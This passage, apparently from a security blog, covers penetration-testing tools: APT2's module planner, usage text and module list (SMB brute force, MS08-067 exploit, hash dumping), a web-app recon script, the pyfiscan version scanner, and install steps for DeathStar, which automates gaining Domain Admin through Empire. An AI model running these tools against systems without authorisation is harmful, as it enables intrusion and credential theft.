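    "anonftp":              ("ftp", 5),
    "httpserverversion":    ("http", 5),
    "httpscreenshot":       ("http", 4),
    "nullsessionsmbclient": ("microsoft-ds", 4),
    "msf_snmplogin":        ("snmp", 3),
    "hydrasmbpassword":     ("microsoft-ds", 2),
    "msf_ms08_067":         ("microsoft-ds", 1),
}

def load_nmap_xml(xml_text):
    """Knowledge base: {ip: {service_name: [port, ...]}} built from open ports only."""
    kb = defaultdict(lambda: defaultdict(list))
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue                      # filtered/closed ports never reach a module
            svc = port.find("service")
            name = svc.get("name") if svc is not None else "unknown"
            kb[addr][name].append(int(port.get("portid")))
    return kb

def plan(kb, min_safe_level=4, modules=MODULES):
    """Return sorted (ip, port, module) triples for every module whose safe level
    is at least `min_safe_level` and whose target service is open on the host."""
    jobs = []
    for ip, services in kb.items():
        for name, (target_service, level) in modules.items():
            if level < min_safe_level:
                continue                      # too intrusive for this run
            for port in services.get(target_service, []):
                jobs.append((ip, port, name))
    return sorted(jobs)

if __name__ == "__main__":
    for job in plan(load_nmap_xml(SAMPLE_NMAP_XML)):
        print(*job)
```

Note what the default level of 4 does to the plan: the SMB null-session check runs, but the SMB password brute force and the MS08-067 exploit against the same host do not until the operator lowers the level deliberately.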

Usage:

usage: apt2.py [-h] [-C <config.txt>] [-f [<input file> [<input file> ...]]]
[--target] [--ip <local IP>] [-v] [-s SAFE_LEVEL] [-b]
[--listmodules]
optional arguments:
-h, --help            show this help message and exit
-v, --verbosity       increase output verbosity
-s SAFE_LEVEL, --safelevel SAFE_LEVEL
set min safe level for modules
-b, --bypassmenu      bypass menu and run from command line arguments
inputs:
-C <config.txt>       config file
-f [<input file> [<input file> ...]]
one or more input files separated by spaces
--target              initial scan target(s)
ADVANCED:
--ip <local IP>       defaults to ip of interface
misc:
--listmodules         list out all current modules

Modules

-----------------------
LIST OF CURRENT MODULES
-----------------------
nmaploadxml               Load NMap XML File
hydrasmbpassword          Attempt to bruteforce SMB passwords
nullsessionrpcclient      Test for NULL Session
msf_snmpenumshares        Enumerate SMB Shares via LanManager OID Values
nmapbasescan              Standard NMap Scan
impacketsecretsdump       Test for NULL Session
msf_dumphashes            Gather hashes from MSF Sessions
msf_smbuserenum           Get List of Users From SMB
anonftp                   Test for Anonymous FTP
searchnfsshare            Search files on NFS Shares
crackPasswordHashJohnTR   Attempt to crack any password hashes
msf_vncnoneauth           Detect VNC Services with the None authentication type
nmapsslscan               NMap SSL Scan
nmapsmbsigning            NMap SMB-Signing Scan
responder                 Run Responder and watch for hashes
msf_openx11               Attempt Login To Open X11 Service
nmapvncbrute              NMap VNC Brute Scan
msf_gathersessioninfo     Get Info about any new sessions
nmapsmbshares             NMap SMB Share Scan
userenumrpcclient         Get List of Users From SMB
httpscreenshot            Get Screen Shot of Web Pages
httpserverversion         Get HTTP Server Version
nullsessionsmbclient      Test for NULL Session
openx11                   Attempt Login To Open X11 Servicei and Get Screenshot
msf_snmplogin             Attempt Login Using Common Community Strings
msf_snmpenumusers         Enumerate Local User Accounts Using LanManager/psProcessUsername OID Values
httpoptions               Get HTTP Options
nmapnfsshares             NMap NFS Share Scan
msf_javarmi               Attempt to Exploit A Java RMI Service
anonldap                  Test for Anonymous LDAP Searches
ssltestsslserver          Determine SSL protocols and ciphers
gethostname               Determine the hostname for each IP
sslsslscan                Determine SSL protocols and ciphers
nmapms08067scan           NMap MS08-067 Scan
msf_ms08_067              Attempt to exploit MS08-067

Auto Web Application Penetration Testing: Intelligence Gathering

Hi all,
A penetration test (pentest for short) is a method of attacking a computer’s systems in the hope of finding weaknesses in its security. If the pentest successfully gains access, it shows that computer functionality and data may be compromised.
Penetration tests serve a range of valuable purposes. One of their main purposes is finding vulnerabilities that are difficult for automated security systems to detect. Additionally, they determine the impact of attacks on computer systems, test network defense systems, and provide the details needed to support an increase in spending on security technology.
The testing is executed based on the following methodology:
For more information, please read this article.
In this post, I want to introduce my auto_webapp_pentest script.
Intelligence Gathering option
+ Finding Subdomains
My script uses several tools to find subdomains:
Fuzzing tool
Sublist3r
Brute force DNS
Finally, the results are saved to a result.txt file.
+ Fingerprint Web Server
For this option, I use whatweb, nikto, wafw00f and more to gather information about the target web server.
+ Discover Content
Finding the target CMS => Fuzzing the target CMS (checking default and backup files, vulnerability scanning)
If your target is running WordPress, Joomla, Drupal, … this script will enumerate all plugins, themes, sensitive directories and vulnerabilities.
For example, my target is running vBulletin:

DEMO

I am still working on the script. When it is complete, I will share it with you.

pyfiscan: Free web-application vulnerability and version scanner

Pyfiscan is a free web-application vulnerability and version scanner that can be used to locate outdated versions of common web applications on Linux servers. An example use case is a hosting provider keeping an eye on its users' installations to make sure security updates are applied. Fingerprints are easy to create and modify, since the user writes them in YAML syntax. Pyfiscan also contains a tool to create email alerts using templates.

Detects the following software

  • ATutor
  • BigTree CMS
  • Bugzilla
  • Centreon
  • Claroline
  • ClipperCMS
  • CMSimple
  • CMSMS
  • Collabtive
  • Concrete5
  • Coppermine
  • Cotonti
  • Croogo
  • CubeCart
  • Dolibarr
  • Dotclear
  • Drupal
  • e107
  • EspoCRM
  • Etherpad
  • FluxBB
  • Foswiki
  • Gallery
  • Gollum
  • HelpDEZk
  • HumHub
  • ImpressCMS
  • ImpressPages
  • Jamroom
  • Joomla
  • KCFinder
  • LiteCart
  • Magnolia
  • Mahara
  • MantisBT
  • MediaWiki
  • Microweber
  • MiniBB
  • MODX Revolution
  • MoinMoin
  • MyBB
  • Nibbleblog
  • Open Source Social Network
  • OpenCart
  • osDate
  • ownCloud
  • Oxwall
  • PBBoard
  • phpBB3
  • PhpGedView
  • phpMyAdmin
  • Piwigo
  • Piwik
  • PmWiki
  • Postfix Admin
  • Redaxo
  • Roundcube
  • SaurusCMS
  • Serendipity
  • SMF
  • SPIP
  • SquirrelMail
  • TestLink
  • TikiWiki
  • Trac
  • WikkaWiki
  • WordPress
  • X-Cart
  • Zenphoto
  • Zikula

Installation

apt-get install python python-pip libpython2.7-dev libyaml-dev git libyaml-dev
git clone https://github.com/fgeek/pyfiscan.git && cd pyfiscan
pip2 install -r requirements.lst
Source: Github
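The version-comparison idea behind pyfiscan, as an added, self-contained Python example (not pyfiscan's own code): a fingerprint names a file to look for, a regex for the version string and a minimum secure version, and the scanner walks a hosting document root and flags older installs. The fingerprint field names, the "secure" versions and the two sample sites are constructed assumptions, not pyfiscan's real YAML schema or data.

```python
import os
import re
import tempfile

# Simplified fingerprint table for this added example. pyfiscan keeps its fingerprints
# in YAML; field names and "secure" versions here are placeholders, not pyfiscan's data.
FINGERPRINTS = {
    "WordPress": {"location": "wp-includes/version.php",          # holds $wp_version
                  "regex": r"\$wp_version\s*=\s*'([0-9.]+)'", "secure": "4.8"},
    "Drupal": {"location": "includes/bootstrap.inc",             # Drupal 7 VERSION define
               "regex": r"define\('VERSION',\s*'([0-9.]+)'\)", "secure": "7.54"},
}

def parse_version(text):
    """'4.7.3' -> (4, 7, 3); int tuples compare correctly where strings ('4.10' < '4.9') do not."""
    return tuple(int(part) for part in text.split("."))

def scan(root, fingerprints=FINGERPRINTS):
    """Walk a document root and flag every install older than its fingerprint's secure version."""
    findings = []
    for dirpath, _dirs, _files in os.walk(root):
        for app, fp in fingerprints.items():
            candidate = os.path.join(dirpath, fp["location"])
            if not os.path.isfile(candidate):
                continue
            with open(candidate, encoding="utf-8", errors="replace") as fh:
                match = re.search(fp["regex"], fh.read())
            if not match:
                continue  # file present but no version string: report nothing rather than guess
            found = match.group(1)
            findings.append({"app": app, "path": dirpath, "version": found, "secure": fp["secure"],
                             "outdated": parse_version(found) < parse_version(fp["secure"])})
    return findings

def demo():
    """Build a constructed two-site hosting tree in a temp dir (not real installs) and scan it."""
    root = tempfile.mkdtemp(prefix="pyfiscan_demo_")
    samples = {"site1/wp-includes/version.php": "<?php\n$wp_version = '4.7.3';\n",
               "site2/includes/bootstrap.inc": "<?php\ndefine('VERSION', '7.54');\n"}
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return sorted(scan(root), key=lambda f: f["app"])

if __name__ == "__main__":
    for f in demo():
        print(f["app"], f["version"], "OUTDATED" if f["outdated"] else "ok", f["path"])
```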

DeathStar: automated domain infiltration tool

DeathStar is a Python script that uses Empire’s RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techniques.
The following picture can be a good explanation of DeathStar’s operating mechanism:

Installation

git clone https://github.com/byt3bl33d3r/Empire
cd Empire/setup && ./install.sh && cd ..
# Start the Empire console and RESTful API
python empire --rest --username empireadmin --password Password123
git clone https://github.com/byt3bl33d3r/DeathStar
# Death Star is written in Python3
pip3 install -r requirements.txt
./DeathStar.py

Usage

  1. Run DeathStar
  2. Get an Empire Agent on a box connected to a Domain
  3. Go grab a coffee/tea/redbull, DeathStar will take care of everything else 😉

Demo

Source: Github